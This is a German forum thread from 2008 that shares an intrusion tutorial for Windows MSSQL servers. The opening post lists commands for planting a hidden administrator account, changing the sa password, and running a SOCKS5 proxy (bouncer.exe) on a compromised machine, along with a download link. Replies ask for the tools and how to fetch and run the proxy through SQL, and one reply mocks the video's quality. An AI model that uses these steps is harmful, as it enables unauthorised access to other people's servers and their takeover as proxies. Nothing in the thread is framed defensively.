[Hacking] Windows Server scannen, hacken & weiterverwenden. [Video]

Dieses Thema im Forum "Security Tutorials" wurde erstellt von eRza, 6. Januar 2008 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 6. Januar 2008
    Windows Server scannen, hacken & weiterverwenden. [Video]

    Guten Morgen,

    ich habe euch ein kleines Tut gemacht indem ihr lernt:

    • Wie scanne ich nach MSSQL Server
    • Wie brute / Hacke ich MSSQL Server
    • Wie komme ich in den RemoteDesktop
    • Was kann ich damit machen

    Ich hoffe es bringt euch weiter.

    Die Befehle:

    Code:
    User Adden: NET USERS username pw /ADD
    Administratorrechte geben: NET LOCALGROUP Administrators usernname /ADD
    MSSQL PW ändern: osql -E -Q "sp_password altes pw,neuespw,sa"
    
    Startbefehl für die bouncer.exe als Socks5:
    bouncer.exe --port 1337 --socks5 --daemon --s_user username --s_password passwort
    

    DL: Klick

    PW:by.IncheZ.4.RR





    Viel Spaß damit.

    Bewertung wäre nett.
     
  2. 6. Januar 2008
    AW: Windows Server scannen, hacken & weiterverwenden. [Video]

    jo alles soweit und gut^^ klingt alles super

    doch woher soll man die tools holen ? finde die nirgends

    hat die zufälligerweise jemand ?
     
  3. 20. Januar 2008
    AW: Windows Server scannen, hacken & weiterverwenden. [Video]

    Hi,

    erstmal Danke für das wirklich gelungene Tutorial!

    Nun eine Frage:
    Wäre es möglich Bouncer.exe per Sql-Befehl auf einen Server downzuloaden und auszuführen, um einen Proxy aufzusetzen, wenn man keinen Remotezugang erhält?

    Danke im Voraus.
     
  4. 23. Januar 2008
    AW: Windows Server scannen, hacken & weiterverwenden. [Video]

    Ich muss Partyinder voll zustimmen !
    Das Tut ist echt super , wäre bloß nett wenn du noch die Progs uppen könntest.
    BW ist natürlich raus !

    P.S.: Hoffentlich bist du wieder gesund .
     
  5. 26. Januar 2008
    AW: Windows Server scannen, hacken & weiterverwenden. [Video]

    Hallo ^^

    also nicht das ich mich beschwerern will aber:

    1. mssql scannen mit xray? --> alles klar...

    2. "Asia ist schön weit weg wegen sachen security" und "aber ich bin auch mit proxy drin, von daher ist mir das scheiß egal"

    --> ah ja... LOL... ich glaube kaum, dass er xray über nen proxy benutzt hat... und ich glaube kaum, dass er weiß was nen VPN ist...

    3. "man soll keine verteidigungsministerien scannen" ---> ja ach ne... ich glaub kaum, dass die nen mssql server laufen haben....

    4. sqlecex --> LOL

    5. er will nen ts user anlegen... "den user sollten wir vom namen her ein wenig tarnen... wir nennen ihn "sql..." " und dann wird es toten still und er denkt nach.... LOL dann hat er doch den namen mssqlmanager für sich entdeckt.... ^^ sehr seriös und getarnt *gg*und das pw raidrush2008 ^^

    6. "die fragezeichen bestätigen wieder, dass es geklappt hat" --> LOL, was wird wohl bei nem asiatischem server für ne ausgabe bei sqlexec kommen, wenn es nicht geklappt hat?! - richtig nur fragezeichen !!!

    7. LOL, er will das pw ändern und wundert dich, dass es nicht geht... dumm nur, dass er nen osql command in sqlexec eingetippt hat... naja wayne... und sowas nett er securen, damit "wir nicht in 2 stunden einen neuen hacker am start haben" ^^^^

    8. die ausrede, warum die methode über TS nicht ging und er sich nicht einloggen konnte, war ja sowas von arm .................

    so mehr vertägt mein armes herz nicht.... jetzt reichts, nachdem er sich auf nen server per ts verbunden hat und ihn abgestempelt hat, als könne der nix und sei zu nix zu gebrauchen.... (da hat er wohl 1 mal recht!)

    9. ganz schön arm, dass der leet hacker die commands zum hacken aus ner txt kopieren muss....

    also wenn man schon nen video erstellt, dann sollte man nen bissel ahnung haben und nicht nur müll labern...

    mfg halloweenracer



    6.
     
  6. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.